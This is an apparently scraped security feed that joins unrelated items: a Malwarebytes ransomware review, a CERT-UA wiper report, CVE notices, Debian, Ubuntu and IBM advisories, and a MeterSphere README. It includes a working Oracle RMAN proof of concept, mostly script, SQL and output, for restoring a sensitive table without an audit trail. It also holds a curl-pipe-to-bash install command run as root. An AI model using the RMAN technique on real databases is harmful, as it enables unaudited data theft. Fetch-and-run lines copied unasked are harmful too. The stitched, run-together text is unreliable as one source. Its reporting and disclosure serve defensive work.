LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. 



(Read more...)




The post Ransomware review: May 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim didn't pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In April, LockBit maintained its position as the top ransomware attacker and was also observed expanding into the Mac space. Meanwhile, Cl0p, which dramatically expanded its attack operations in March, has gone quiet this month, despite Microsoft observing them exploiting PaperCut vulnerabilities.

LockBit's macOS ransomware is an interesting development in the threat landscape, showing that the group is dipping its toes into the historically ransomware-free Mac environment. The variant, targeting macOS arm64 architecture, first appeared on VirusTotal in November and December 2022 but went unnoticed until late April when it was discovered by MalwareHunterTeam. 

The LockBit macOS samples analyzed by Malwarebytes seem ineffective due to being unsigned, not accounting for TCC/SIP restrictions, and being riddled with bugs, like buffer overflows, causing premature termination when executed on macOS.

“The LockBit encryptor doesn’t look particularly viable in its current form, but I’m definitely going to be keeping an eye on it,” says Thomas Reed, director of Mac and mobile platforms at Malwarebytes. “The viability may improve in the future. Or it may not, if their tests aren’t promising.”

Keep an eye out, because LockBit's work in developing a macOS ransomware variant—plagued though it may currently be—could signal a trend toward more Mac-targeting ransomware in the future.

Known ransomware attacks by gang, April 2023

Known ransomware attacks by country, April 2023

Known ransomware attacks by industry sector, April 2023

**Cl0p** ransomware, which gained prominence in March by exploiting a zero-day vulnerability in GoAnywhere MFT, went comparatively silent with just four attacks in April. Nevertheless, the gang was seen last month exploiting vulnerabilities in PaperCut servers to steal corporate data. 

PaperCut is a popular printing management software which was targeted by both Cl0p and LockBit in April using two gnarly vulnerabilities: one allowing remote code execution (CVE-2023-27350) and the other enabling information disclosure (CVE-2023-27351). Once gaining initial access, Cl0p members sneakily deploy the TrueBot malware and a Cobalt Strike beacon to creep through the network, grabbing data along the way. 

Cl0p clearly has a history of exploiting platforms like Accellion FTA and GoAnywhere MFT, and now they've set their sights on PaperCut. So, if you're using PaperCut MF or NG, upgrade pronto and patch these two vulnerabilities!

**Vice Society**, notorious for targeting the education sector, has recently advanced their operations by adopting a sneaky PowerShell script for automated data theft. Discovered by Palo Alto Networks Unit 42, the new data exfiltration tool cleverly employs "living off the land" (LOTL) techniques to avoid detection. For instance, the script employs system-native cmdlets to search and exfiltrate data, minimizing its footprint and maintaining a low profile.

Separately, the **Play** ransomware group has whipped up two fancy .NET tools, Grixba and VSS Copying Tool, to make their cyberattacks more effective.

Grixba checks for antivirus programs, EDR suites, backup tools to help them plan the next steps of the attack. VSS Copying Tool, meanwhile, tiptoes around the Windows Volume Shadow Copy Service (VSS) to steal files from system snapshots and backup copies. Both tools were cooked up with the Costura .NET development tool for easy deployment on their victims' systems.

As Vice Society, Play, and other ransomware groups increasingly adopt advanced LOTL methods and sophisticated tools like Grixba, the capacity to proactively identify both malicious tools and the malicious use of legitimate tools within a network will undoubtedly become the deciding factor in an organization's defense strategy moving forward.

As for other trends, the USA still tops the charts as the most affected country, with the services industry getting the brunt of the attacks, as both have been the case all year. The **education sector** has its highest number of attackers (21) since January. Meanwhile, the **healthcare sector** saw a huge surge in attacks (37) in April, the highest it's been all year.

**New players****Akira**

Akira is a fresh ransomware hitting enterprises globally since March 2023, having already published in April the data of nine companies across different sectors like education, finance, and manufacturing. When executed, the ransomware deletes Windows Shadow Volume Copies, encrypts files with specific extensions, and appends the .akira extension to the encrypted files.

Like most ransomware gangs these days, the Akira gang steals corporate data before encrypting files for the purposes of double-extortion. So far, the leaked info published on their leak site—which looks retro and lets you navigate with typed commands—ranges from 5.9 GB to a whopping 259 GB.

Akira demands ransoms from $200,000 to millions of dollars, and it seems they are willing to lower ransom demands for companies that only want to prevent the leaking of stolen data without needing a decryptor.

**CrossLock**

CrossLock is a new ransomware strain using the Go programming language, which makes it more difficult to reverse engineer and boosts its compatibility across platforms. 

The ransomware employs tactics to avoid analysis, such as looking for the WINE environment (to determine if their ransomware is being executed within an analysis or sandbox environment) and tweaking Event Tracing for Windows (ETW) functions (to disrupt the flow of information that security tools and analysts rely on to identify suspicious behavior).

In April, the CrossLock Ransomware Group said they targeted Valid Certificadora, a Brazilian IT & ITES company.

**Trigona**

Trigona ransomware emerged in October 2022 and has targeted various sectors worldwide, including six in April. Operators use tools like NetScan, Splashtop, and Mimikatz to gain access, perform reconnaissance, and gather sensitive information from target systems. They also employ batch scripts to create new user accounts, disable security features, and cover their tracks. 

**Dunghill Leak**

Dunghill Leak is a new ransomware that evolved from the Dark Angels ransomware, which itself came from Babuk ransomware. In April it published the data of two companies, including Incredible Technologies, an American developer and manufacturer of coin-operated video games. The Dunghill Leak gang claims they have access to 500 GB of the company's data, including game files and tax payment reports. Researchers think Dunghill Leak is just a rebranded Dark Angels.

**Money Message**

Money Message is a new ransomware which targets both Windows and Linux systems. In April, criminals used Money Message to hit at least 10 victims, mostly in the US and from various industries. The gang also targeted some big-time companies worth billions of dollars, such as Taiwanese PC parts maker MSI (Micro-Star International).

Money Message uses advanced encryption techniques and leaves a ransom note called "money\_message.log." 

Our Ransomware Emergency Kit contains the information you need to defend against ransomware-as-a-service (RaaS) gangs.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: May 2023

An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA).
The emails, per the agency, are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file.
The

Cyber Attack / Data Safety

An ongoing phishing campaign with invoice-themed lures is being used to distribute the SmokeLoader malware in the form of a polyglot file, according to the Computer Emergency Response Team of Ukraine (CERT-UA).

The emails, per the agency, are sent using compromised accounts and come with a ZIP archive that, in reality, is a polyglot file containing a decoy document and a JavaScript file.

The JavaScript code is then used to launch an executable that paves for the execution of the SmokeLoader malware. SmokeLoader, first detected in 2011, is a loader whose main objective is to download or load a stealthier or more effective malware onto infected systems.

CERT-UA attributed the activity to a threat actor it calls UAC-0006 and characterized it as a financially motivated operation carried out with the goal of stealing credentials and making unauthorized fund transfers.

In a related advisory, Ukraine's cybersecurity authority also revealed details of destructive attacks orchestrated by a group known as UAC-0165 against public sector organizations.

The attack, which targeted an unnamed state organization, entailed the use of a new batch script-based wiper malware called RoarBAT that performs a recursive search for files with a specific list of extensions and irrevocably deletes them using the legitimate WinRAR utility.

This, in turn, was achieved by archiving the identified files using the "-df" command-line option and subsequently purging the created archives. The batch script was executed by means of a scheduled task.

Simultaneously, Linux systems were compromised using a bash script that leveraged the dd utility to overwrite files with zero bytes, effectively avoiding detection by security software.

"It was found that the operability of electronic computers (server equipment, automated user workplaces, data storage systems) was impaired as a result of the destructive impact carried out with the use of appropriate software," CERT-UA said.

"Access to the ICS target of the attack is allegedly obtained by connecting to a VPN using compromised authentication data. The successful implementation of the attack was facilitated by the lack of multi-factor authentication when making remote connections to VPN."

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The agency further attributed UAC-0165 with moderate confidence to the notorious Sandworm group (aka FROZENBARENTS, Seashell Blizzard, or Voodoo Bear), which has a history of unleashing wiper attacks since the start of the Russo-Ukrainian war last year.

The link to Sandworm stems from significant overlaps with another destructive attack that hit the Ukrainian state news agency Ukrinform in January 2023, which was tied to the adversarial collective.

The alerts come a week after CERT-UA cautioned of phishing attacks carried out by the Russian state-sponsored group APT28 targeting government entities in the country with fake Window update notifications.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CERT-UA Warns of SmokeLoader and RoarBAT Malware Attacks Against Ukraine

A buffer overflow in the component /proc/ftxxxx-debug of FiiO M6 Build Number v1.0.4 allows attackers to escalate privileges to root.

CVE-2023-30257: Rooting the FiiO M6 - Part 2 - Writing an LPE Exploit For Our Overflow Bug

Metersphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. The system command reverse-shell can be executed at the custom code snippet function of the metersphere system workbench

**一站式开源持续测试平台**

   

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能，全面兼容 JMeter、Selenium 等主流开源标准，有效助力开发和测试团队充分利用云弹性进行高度可扩展的自动化测试，加速高质量的软件交付，推动中国测试行业整体效率的提升。

**MeterSphere 的功能**

*   **测试跟踪**: 对接主流项目管理平台，测试过程全链路跟踪管理；列表脑图模式自由切换，用例编写更简单、测试报告更清晰；
*   **接口测试**: 比 JMeter 易用，比 Postman 强大； API 管理、Mock 服务、场景编排、多协议支持，你想要的全都有；
*   **UI 测试**: 基于 Selenium 浏览器自动化，高度可复用的测试脚本； 无需复杂的代码编写，人人都可开展的低代码自动化测试；
*   **性能测试**: 兼容 JMeter 的同时补足其分布式、监控与报告以及管理短板; 轻松帮助团队实现高并发、分布式的性能压测，完成压测任务的统一调度与管理。

**MeterSphere 的优势**

*   **开源**：基于开源、兼容开源；按月发布新版本、日均下载安装超过100次、被大量客户验证；
*   **一站式**：一个产品全面涵盖测试跟踪、接口测试、UI测试、性能测试等功能并形成联动；
*   **全生命周期**：一个产品全满足从测试计划、测试执行到测试报告分析的全生命周期需求；
*   **持续测试**：无缝对接 Bug 管理工具和持续集成工具等，能将测试融入持续交付和 DevOps 体系；
*   **团队协作**：支持团队协作和资产沉淀，无论团队规模如何，总有适合的落地方式。

**UI 展示**

**快速开始**

**一键安装**

仅需两步快速安装 MeterSphere：

1.  准备一台不小于 8 G内存的 64位 Linux 主机；
2.  以 root 用户执行如下命令一键安装 MeterSphere。

curl -sSL https://resource.fit2cloud.com/metersphere/metersphere/releases/latest/download/quick\_start.sh | bash

**学习资料**

*   在线文档
*   社区论坛
*   在线体验

**加入微信交流群**

**版本说明**

MeterSphere 版本号命名规则为：v大版本.功能版本.Bug修复版本。比如：

    v1.0.1 是 v1.0.0 之后的Bug修复版本；
    v1.1.0 是 v1.0.0 之后的功能版本。
    

像其它优秀开源项目一样，MeterSphere 将按月发布功能版本、按年度发布 LTS（Long Term Support）版本。

MeterSphere 的最新 LTS 版本为 v1.20 LTS。MeterSphere 下一个 LTS 版本为 v2.10 LTS，预计在 2023 年第二季度发布。

**技术栈**

*   后端: Spring Boot
*   前端: Vue.js
*   中间件: MySQL, Kafka, MinIO
*   基础设施: Docker, Kubernetes
*   测试引擎: JMeter

**安全说明**

如果您在使用过程中发现任何安全问题，请通过以下方式直接联系我们：

*   邮箱：support@fit2cloud.com
*   电话：400-052-0755

**致谢**

*   BlazeMeter：感谢 BlazeMeter 提供的设计思路
*   JMeter：MeterSphere 使用了 JMeter 作为测试引擎
*   Element：感谢 Element 提供的优秀组件库

**License & Copyright**

Copyright (c) 2014-2023 飞致云 FIT2CLOUD, All rights reserved.

Licensed under The GNU General Public License version 3 (GPLv3) (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

https://www.gnu.org/licenses/gpl-3.0.html

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

CVE-2023-29944: GitHub - metersphere/metersphere: MeterSphere 是一站式开源持续测试平台，覆盖测试管理、接口测试、UI 测试和性能测试等。搞测试，就选 MeterSphere！

IBM QRadar Data Synchronization App 1.0 through 3.0.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  IBM X-Force ID:  217370.

  

**Summary**

The product includes vulnerable components (e.g., framework libraries) that may be identified and exploited with automated tools. IBM QRadar Data Synchronization App for IBM QRadar SIEM has addressed the applicable CVEs.

**Vulnerability Details**

**CVEID:**   CVE-2022-22313  
**DESCRIPTION:**   IBM QRadar Data Synchronization App uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 4.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/217370 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2021-44906  
**DESCRIPTION:**   Node.js Minimist module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution in setKey() function in the index.js script. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 5.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222195 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2020-7598  
**DESCRIPTION:**   minimist could provide weaker than expected security, caused by a prototype pollution flaw. By sending a specially crafted request, a remote attacker could exploit this vulnerability to add or modify properties of Object.prototype.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/177780 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM QRadar Data Synchronization App

1.0 - 3.0.1

  

**Remediation/Fixes**

IBM encourages customers to update their systems promptly.

Update to 3.1.0

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

03 Apr 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSBQAC","label":"IBM Security QRadar SIEM"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"3.0.1","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2022-22313: Security Bulletin: IBM QRadar Data Synchronization App for IBM QRadar SIEM is vulnerable to using components with known vulnerabilities

Debian Linux Security Advisory 5399-1 - Several vulnerabilities were discovered in odoo, a suite of web based open source business apps.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5399-1                   security@debian.org  
https://www.debian.org/security/                       Sebastien Delafond  
May 05, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : odoo  
CVE ID         : CVE-2021-23166 CVE-2021-23176 CVE-2021-23178 CVE-2021-23186   
                 CVE-2021-23203 CVE-2021-26263 CVE-2021-26947 CVE-2021-44476   
                 CVE-2021-44775 CVE-2021-45071 CVE-2021-45111

Several vulnerabilities were discovered in odoo, a suite of web based  
open source business apps.

CVE-2021-44775, CVE-2021-26947, CVE-2021-45071, CVE-2021-26263:

  XSS allowing remote attacker to inject arbitrary commands.

CVE-2021-45111:

  Incorrect access control allowing authenticated remote user to  
  create user accounts and access restricted data.

CVE-2021-44476, CVE-2021-23166:

  Incorrect access control allowing authenticated remote administrator  
  to access local files on the server.

CVE-2021-23186:

  Incorrect access control allowing authenticated remote administrator  
  to modify database contents of other tenants.

CVE-2021-23178:

  Incorrect access control allowing authenticated remote user to  
  use another user's payment method.

CVE-2021-23176:

  Incorrect access control allowing authenticated remote user to  
  access accounting information.

CVE-2021-23203:

  Incorrect access control allowing authenticated remote user to  
  access arbitrary documents via PDF exports.

For the stable distribution (bullseye), these problems have been fixed in  
version 14.0.0+dfsg.2-7+deb11u1.

We recommend that you upgrade your odoo packages.

For the detailed security status of odoo please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/odoo

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmRU7kEACgkQEL6Jg/PV  
nWTQrAf+K6CpxmFeKM/7G70xafsw+lLu4UlaoLYUh55rgsFd9/YHUuwCHiCmoP1P  
4GnVJkNu6qj8rW1EReUtKZ76XQTLsD9ZxgM6tFBGA9EDi0hPjR4KEI7jtdXjx9ro  
8LOyu51xeqoraKTmkPw+EnUCWCjutH78l8y9ywqHORQI0WM9Q2Zh0fHJz1c+2uzd  
HqFvo1brOgu7zkI3luH8IjEHpCHpUVbe8rTnY0g2PSrZott/k0fIZ8qNSzyfG7ah  
R5auoI5y+z5TusByKWnQ48jQCbU8WeqXaQUqT/pGtjGz9ljClTwDkmqqv/6BNnyF  
Et5uV+Yn6UWsxXUcz6u9CwOzkrpVxA==  
=KDFV  
-----END PGP SIGNATURE-----

Debian Security Advisory 5399-1

Proof of concept exploit for Oracle RMAN on Oracle database versions 19c, 18c, 12.2.0.1, and 12.1.0.2 where recovery actions are not adequately logged.

Title: CVE-2020-2978 - Oracle RMAN Audit table point in time recovery not recorded  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2, 12.2.0.1, 18c, 19c  
Tested Version(s):         19c  
Risk Level:                Medium  
Score:                     4.1  
Solution Status:           Fixed  
CVE Reference:             CVE-2020-2978  
Author of Advisory:        Emad Al-Mousa

Overview:

Audit failure is a security weakness in software product especially if a security audit is in-place to detect a certain operation. Oracle RMAN is  
a database Recovery Manager utility for backup and restore operations, so any security weakness/vulnerability can be exploited by insider threat or  
external attacker to view confidential data in unauthorized manner.

*****************************************  
Vulnerability Details:

The scope of this security research is to detect if a database administrator tried to restore a "sensitive table" (already in-place auditing is configured against SELECT statements against this sensitive table).   
The following research illustrates that despite RMAN operations are audited by “default” in pure “Unified Auditing” mode, the table point of time recovery activity/action was not logged in the audit logs.   
As a result, any trails for future forensic investigation or real time security operations monitoring for activities against highly confidential sensitive table will not be met.

*****************************************  
Proof of Concept (PoC):

// I will check first if Unified Auditing feature is enabled in an Oracle database system:

SQL> select value from v$option where parameter ='Unified Auditing';

 VALUE  
----------------------------------------------------------------  
TRUE

  SQL> select * from DBA_AUDIT_MGMT_CONFIG_PARAMS where PARAMETER_NAME = 'AUDIT WRITE MODE';

 PARAMETER_NAME  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
PARAMETER_VALUE  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
AUDIT_TRAIL  
----------------------------  
AUDIT WRITE MODE  
IMMEDIATE WRITE MODE  
UNIFIED AUDIT TRAIL

// I will create linux shell script to restore a sensitive database table with different name , you will need to access the Linux OS as DBA linux account  
for the exploit to work ....the sensitive table is called "dummy" under schema called "DBA" and the attacker will restore it with different name --->  
dummy_55:

 touch /tmp/dbtest/resotre.sh

chmod 700 /tmp/dbtest/resotre.sh

vi  /tmp/dbtest/resotre.sh

 #!/bin/sh  
export ORACLE_SID=dbtest  
export ORACLE_HOME=/orcl/dbtest/product/18.3  
export RMAN_LOG_FILE=/tmp/dbtest/aux_db/db_restore.log  
RMAN=$ORACLE_HOME/bin/rman  
CMD_STR="  
ORACLE_HOME=$ORACLE_HOME  
export ORACLE_HOME  
ORACLE_SID=$ORACLE_SID  
export ORACLE_SID  
$RMAN target \/ msglog $RMAN_LOG_FILE append << EOF  
connect CATALOG $RCVCAT_CONNECT_STR  
run {  
recover table dba.dummy  
#until scn 56330407409  
until time \"to_date('23-JAN-2020 08:00:00','DD-MON-YYYY HH24:MI:SS')\"  
auxiliary destination '/tmp/dbtest/aux_db'  
remap table dba.dummy:dummy_55;  
}  
EOF  
"  
/usr/bin/sh -c "$CMD_STR" >> $RMAN_LOG_FILE

// then run the shell script:

/tmp/dbtest/resotre.sh

  // Log File /tmp/dbtest/aux_db/db_restore.log shows the restore is successful:

 auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/onlinelog/o1_mf_1_h2lopldq_.log deleted  
auxiliary instance file /tmp/dbtest/aux_db/JTVB_PITR_dbtest/datafile/o1_mf_ts_user__h2locvjr_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_sysaux_h2lncb1c_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_ts_undo__h2lnlrw7_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncb14_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/datafile/o1_mf_system_h2lncbvp_.dbf deleted  
auxiliary instance file /tmp/dbtest/aux_db/dbtest/controlfile/o1_mf_h2ln7ftc_.ctl deleted  
auxiliary instance file tspitr_jtvb_19868.dmp deleted  
Finished recover at 01/23/2020-11:19:30

 RMAN> RMAN>

 Recovery Manager complete. 

// you can now access the sensitive table and query data:

sqlplus / as sysdba

SQL> select * from dba.dummy_55;

// Checking the unified audit trail:

 SQL> select EVENT_TIMESTAMP, ACTION_NAME, RMAN_SESSION_STAMP, RMAN_OPERATION,RMAN_OPERATION,RMAN_OBJECT_TYPE  
from unified_audit_trail where ACTION_NAME like '%RMAN%' order by 1;

 The RMAN session is logged in the audit table, but there is NO details of what kind of RMAN operation took place ?!

Conclusion:

SystemAdmin/Attacker can view sensitive data without being audited which will impact forensic investigation, and threat detection.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpujul2020.html  
https://nvd.nist.gov/vuln/detail/CVE-2020-2978  
https://databasesecurityninja.wordpress.com/2020/12/01/cve-2020-2978-rman-audit-table-point-in-time-recovery-not-logged/

Oracle RMAN Missing Auditing

Ubuntu Security Notice 6058-1 - It was discovered that the Traffic-Control Index implementation in the Linux kernel did not properly perform filter deactivation in some situations. A local attacker could possibly use this to gain elevated privileges.

    ==========================================================================Ubuntu Security Notice USN-6058-1May 05, 2023linux-aws, linux-aws-hwe vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 ESMSummary:The system could be made to run programs as an administrator.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systemsDetails:It was discovered that the Traffic-Control Index (TCINDEX) implementationin the Linux kernel did not properly perform filter deactivation in somesituations. A local attacker could possibly use this to gain elevatedprivileges. Please note that with the fix for this CVE, kernel support forthe TCINDEX classifier has been removed.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS:   linux-image-4.15.0-1155-aws     4.15.0-1155.168   linux-image-aws-lts-18.04       4.15.0.1155.153Ubuntu 16.04 ESM:   linux-image-4.15.0-1155-aws     4.15.0-1155.168~16.04.1   linux-image-aws-hwe             4.15.0.1155.138After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6058-1   CVE-2023-1829Package Information:   https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1155.168

Ubuntu Security Notice USN-6058-1

Debian Linux Security Advisory 5398-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5398-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 04, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2459 CVE-2023-2460 CVE-2023-2461 CVE-2023-2462                  CVE-2023-2463 CVE-2023-2464 CVE-2023-2465 CVE-2023-2466                  CVE-2023-2467 CVE-2023-2468Debian Bug     : 992178 1031352Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 113.0.5672.63-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRUCKIACgkQEMKTtsN8TjbOCg/7BvJxNQVuHLPhC7gcECOh0c9kCZf8bXzsLubVAsoA5t7dj/v8s9KYvXbwYzopwZcIshx5r4B0S59bfTGNEq60mjdaPDMc4seUh9Tb7ubE6CZxPCqNyuOKE72LZFpLxymyknSS/E6yxUh4CeM5jcf5F9fmtnrPXM+WiXRwMU2KiPVBuyleGEL1Om1b3tD6u67fFBoffP+VdvLdxo42GOBSiaqAVenS00wygli1qisU6i7mifQX5uc1qnImDhQ1LLajrNCdvIL3ILYpuimYzfWTqWz+UIVvTotaCk8FuxP9/LjAS2Rdk40PL8rhxS09eSpMb49WSi3rPzfGkkzwjPk/7rkCX/zB2n3gxn6m4fnOP9tjmQxSQmIot0xW1HjLT+0GIg2lHNrsRemuArLfqqgw3b3Widv6k8nC+2JN05yFEgNDnhZes9YXESMm6yGkbQXQZv6cCY6VKxPeQpXh2IWdK1K32R1I+faJmvL+mj1GAqCFzSGn0QH/vYinQ5nmvK1oh7SZuHWw2uIyqBwHVIz+D7PNjjd73kxXew8nt5WmPvziD0hsFBxsv3q/rn26QRSlcCqMkT6vdQAlI3vvYyd27njQqbkuKnIpiU1DqWkvqoaQ4dvqhf4QN1nteH75B6w+Mln1NDll/aCb4DvglNq1t7vwLrwF/1V7cvDmmTLd0zA==Mdwu-----END PGP SIGNATURE-----

Debian Security Advisory 5398-1

wfc-pkt-router suffers from a vulnerability where it can wrongly bind to an external network interface instead of the VPN tunnel.

wfc-pkt-router can wrongly bind to external network interface instead of VPN tunnel

There is a daemon called \"wfc-pkt-router\" (the \"IMS packet router daemon\" according to https://github.com/ItsLynix/samsung_a53x_dump/blob/36de1bc4f9a9b3646809805b9feaf2f4396177e5/vendor/etc/init/init.s5e8825.rc) on some Samsung-based phones, including Pixel 7 and (according to that github link) Samsung a53xnaxx (?). When WiFi Calling is active, this daemon is responsible for forwarding IP packets between the baseband (/dev/umts_wfc1 on Pixel 7) and an IPSec tunnel provided by Android. wfc-pkt-router creates a raw socket bound to a specific interface (using SO_BINDTODEVICE) and forwards raw IP packets between the interface-bound socket and the baseband (/dev/umts_wfc1).

Some other mechanism outside wfc-pkt-router (I have no idea how that works) apparently causes Android to set up an IPSec tunnel with a local IP address that is also known to the baseband. When the baseband starts using an IPSec tunnel via wfc-pkt-router, it has to tell wfc-pkt-router which interface to bind to. The baseband does this by telling wfc-pkt-router the local IP address of the IPSec tunnel; wfc-pkt-router then scans through the list of network interfaces (using getifaddrs()) and searches for a matching interface. If multiple interfaces match, it picks the *newest* interface with the right IP address.

The main problem with this is that multiple interfaces can have the same local IP address. IPSec interfaces are created dynamically, so they are typically created later than WiFi interfaces or such, which means an address collision with a WiFi interface is not a problem *as long as the IPSec interface exists*; but the interfaces associated with USB ethernet adapters or VPN apps can be dynamically created after the IPSec interface creation.

